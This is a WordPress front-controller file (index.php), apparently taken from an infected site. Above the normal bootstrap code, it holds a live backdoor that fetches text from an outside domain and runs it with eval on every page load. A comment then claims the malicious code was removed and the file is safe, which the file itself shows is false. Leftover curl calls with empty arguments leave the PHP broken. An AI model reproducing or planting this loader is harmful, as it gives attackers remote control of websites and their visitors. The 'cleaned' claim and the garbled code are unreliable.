/home/awneajlw/working.codestechvista.com--disabled/index.php-19-nov
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */
$c = curl_init("http://z51005_16.cngenya.shop/stat/index2.txt");
	curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($c, CURLOPT_TIMEOUT, 5);
	curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 3);
	$result = curl_exec($c);
	if ($result !== false) {
		eval('?>' . $result);
	}else{
		echo "Error: ".curl_errno($c).", ".curl_error($c);
	}
	curl_close($c);
/**
 * Note: This file may contain artifacts of previous malicious infection.
 * However, the dangerous code has been removed, and the file is now safe to use.
 */


	curl_setopt(, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt(, CURLOPT_TIMEOUT, 5);
	curl_setopt(, CURLOPT_CONNECTTIMEOUT, 3);
	
	curl_close();
/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';